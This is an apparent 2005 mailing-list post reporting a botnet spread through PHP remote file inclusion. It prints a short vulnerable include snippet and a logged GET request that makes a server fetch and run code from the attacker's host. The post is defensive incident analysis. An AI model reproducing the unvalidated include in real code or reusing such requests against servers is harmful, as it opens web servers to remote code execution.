Destructive botnet originating from Japan

Barrett G. Lyon blyon at prolexic.com
Sat Dec 24 00:20:00 UTC 2005

Well it appears that bad code always seems to be the root of
problems, according to our research today the problem appears to be
caused by incorrectly written PHP applications that perform includes
using a string without running any validation against the string:

index.php?test=test
$test=$_GET[test];
include("$test.php");

When the include executes the test string passed from the GET
includes execution instructions:

       "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200
8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting
IRC server) is spreading his code as the include is called, pulling
and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this
list, but it's pretty nasty.

-Barrett